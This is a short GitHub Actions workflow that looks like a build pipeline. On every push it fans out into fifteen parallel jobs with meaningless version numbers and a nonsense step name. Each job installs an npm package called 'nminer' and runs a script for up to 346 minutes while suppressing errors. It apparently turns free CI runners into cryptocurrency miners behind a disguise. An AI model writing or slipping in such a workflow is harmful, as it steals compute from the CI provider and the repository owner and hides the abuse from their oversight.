name: swing
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 504 }
          - { version: 7117 }
          - { version: 4332 }
          - { version: 2517 }
          - { version: 4311 }
          - { version: 451 }
          - { version: 3351 }
          - { version: 4702 }
          - { version: 3132 }
          - { version: 1327 }
          - { version: 3275 }
          - { version: 1051 }
          - { version: 8689 }
          - { version: 4591 }
          - { version: 9794 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: which huge whoa furthermore swim
        run: |
          npm install nminer@latest
          timeout 346m node swing.js || echo "swing executed"